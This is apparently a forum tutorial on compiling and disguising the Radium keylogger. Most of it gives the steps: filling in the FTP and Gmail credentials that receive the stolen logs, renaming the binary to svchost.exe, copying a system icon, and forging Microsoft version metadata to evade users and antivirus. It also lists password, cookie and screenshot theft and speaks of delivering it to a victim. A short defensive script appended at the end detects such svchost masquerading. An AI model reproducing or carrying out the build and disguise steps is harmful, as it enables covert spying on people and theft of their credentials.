Detailed guide to creating a keylogger

What will we need?
1. Google the name "Radium Keylogger" and download everything from the github, unpack it into a random folder.

2. Google "Python2. 7 download for free without sms in high quality" download and install with the default parameters, the only thing I would like to say is that you need to select ALL the components to install in the component selection window for installation, respectively.
Otherwise, you will have problems, I will not describe the details.

3. We also download and install everything from there, from the Radium Keylogger page on the github from the Requirements section (pyHook; PyWin32; Microsoft Visual C++ Compiler for Python), except for PyInstaller. We'll use the handles to set it in the next step.

4. Open PowerShell as an administrator. Next, go to the folder with the unpacked source files using the command
Code:
cd With: \ full\path\to \ sources

Then we execute the command
Code:
pip install pyinstaller

We will also install the recommended packages next
Code:
pip install -r .\requirements.txt

5. Opening the source code Radiumkeylogger.py in your favorite text editor, you can even use it in Word.

Looking for strings
Code:
ip = base64. b64decode ("") #IP to connect to FTP server address or domain of the FTP server.

ftpkey = base64. b64decode ("") #FTP password Password from the FTP server.

ftpuser = base64. b64decode ("") #FTP username Name of the FTP server user.

passkey = base64. b64decode ("") #Password to connect to GMAIL smtp server.

userkey = base64. b64decode ("") #Username to connect to GMAIL smtp server Username.

From the name it is not difficult to guess what for what. But I'll tell you what needs to be done.

We replace the values of the form base64. b64decode("") with just stupidly "your value". If you are not too lazy, you can convert your data to base64 using any online converter and put the value in quotation marks between parentheses.

6. Let's go through the source code and fix it for order and disguise wherever it is mentioned "AdobePush.exe" to "svchost.exe". We will also replace "Radiumkeylogger.py" and "AdobePush.py" on svchost.exe to ensure that the autoload is working properly.

7. We compile everything into an executable file, in the same PowerShell

Executing the command
Code:
pyinstaller -onefile -windowedRadiumkeylogger.py

If you did everything correctly, a couple of folders will appear in the source folder. The dist will contain your long-awaited keylogger. This miracle weighs 9100Kb. Which is very sad for malware I have to say, but it can't be helped, I didn't bother because not for myself. Moreover, the standard svchost sometimes burns out 50Mb and if it weighs 20Kb may cause suspicion in an experienced user.

8. This is not all, you can mess with the package and the crypt yourself, we will immediately make a basic disguise. Download and install the VerPatch and Resource Hacker. For your convenience, I chose the most publicly accessible one.

9. Rename the resulting file to svchost.exe. Using Resource Hacker Library /Windows/system32/imageres.dll and we save all its resources in any folder, I think you can understand the functionality of this program.

Next, open our keylogger and replace its icon with 15. ico is a standard icon for applications that do not have resources inside, and the main Windows system processes are displayed with the same icon. Save and exit.

10. Copy our file to the folder with the unpacked VerPatch. Open the command prompt and go to this folder.

Executing the command
Code:
verpatch svchost.exe 6.3.9600.0 /va /s description "Host Process for Windows Services" /s product "Microsoft Windows"

If the system has a Russian locale, replace "Host Process for Windows Services" with the Host Process for Windows services or whatever the hell it is.

After that, our keylogger will only be saved by running on behalf of the user. However, this problem can be easily solved by Googling for a couple of minutes.

11. Everything. You can start and check your email. After starting, you should receive an email notification that everything is OK.

I would like to warn you that logs are sent by default after typing 300 characters screenshots after typing 500 characters, screenshots are packed in 10 pieces and sent to the mail as logs. Naturally, after digging with the handles in the source code, all values can be replaced to meet your requirements.

As you can see, it is not detected by the main antivirus programs only by some very exotic ones. All you have to do is decide whether to deliver it to the victim's car.
 
Radium Keylogger

--> Applications and keystrokes logging
--> Screenshot logging
--> Drive tree structure
--> Logs sending by email
--> Password Recovery for
• Chrome
• Mozilla
• Filezilla
• Core FTP
• CyberDuck
• FTPNavigator
• WinSCP
• Outlook
• Putty
• Skype
• Generic Network
--> Cookie stealer
--> Keylogger stub update mechanism
--> Gather system information
• Internal and External IP
• Ipconfig /all output
• Platform
Github : https://github.com/mehulj94/Radium
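
Added example, not part of the original post or of the Radium project: from the defender's side, the disguise described in steps 6 to 10 (file renamed to svchost.exe, icon swapped, version resource stamped with "Host Process for Windows Services") changes only metadata the file controls itself. The sketch below checks process records for the properties a renamed binary does not get for free. The record fields, the sample data and the assumption that Windows is installed on C: are constructed for illustration.

```python
import ntpath

# Directories the genuine svchost.exe image is loaded from
# (assumption: system drive is C:).
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
LEGIT_PARENT = "services.exe"


def masquerade_findings(proc):
    """Reasons why a process named svchost.exe does not look genuine.

    Returns an empty list for other image names or when nothing is off.
    """
    image = ntpath.normpath(proc["image"])
    if ntpath.basename(image).lower() != "svchost.exe":
        return []
    reasons = []
    if ntpath.dirname(image).lower() not in LEGIT_DIRS:
        reasons.append("image path outside System32/SysWOW64")
    if proc["parent"].lower() != LEGIT_PARENT:
        reasons.append("parent is not services.exe")
    if not proc["microsoft_signed"]:
        reasons.append("no valid Microsoft signature")
    return reasons


def scan(records):
    """Map pid -> findings for every record with at least one finding."""
    hits = {}
    for proc in records:
        reasons = masquerade_findings(proc)
        if reasons:
            hits[proc["pid"]] = reasons
    return hits


# Constructed sample records (hypothetical field names, e.g. as exported by an
# EDR or process-creation log). Both svchost entries carry the same version
# description, so that field cannot tell them apart.
SAMPLE = [
    {"pid": 812, "image": r"C:\Windows\System32\svchost.exe",
     "parent": "services.exe", "microsoft_signed": True,
     "description": "Host Process for Windows Services"},
    {"pid": 5124, "image": r"C:\Users\alice\AppData\Roaming\svchost.exe",
     "parent": "explorer.exe", "microsoft_signed": False,
     "description": "Host Process for Windows Services"},
    {"pid": 3300, "image": r"C:\Program Files\Editor\editor.exe",
     "parent": "explorer.exe", "microsoft_signed": False,
     "description": "Editor"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE).items():
        print(pid, "; ".join(reasons))
```

The description string and icon match in both svchost records, while the image path, parent process and signature state do not, which is why those three are the fields worth alerting on.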
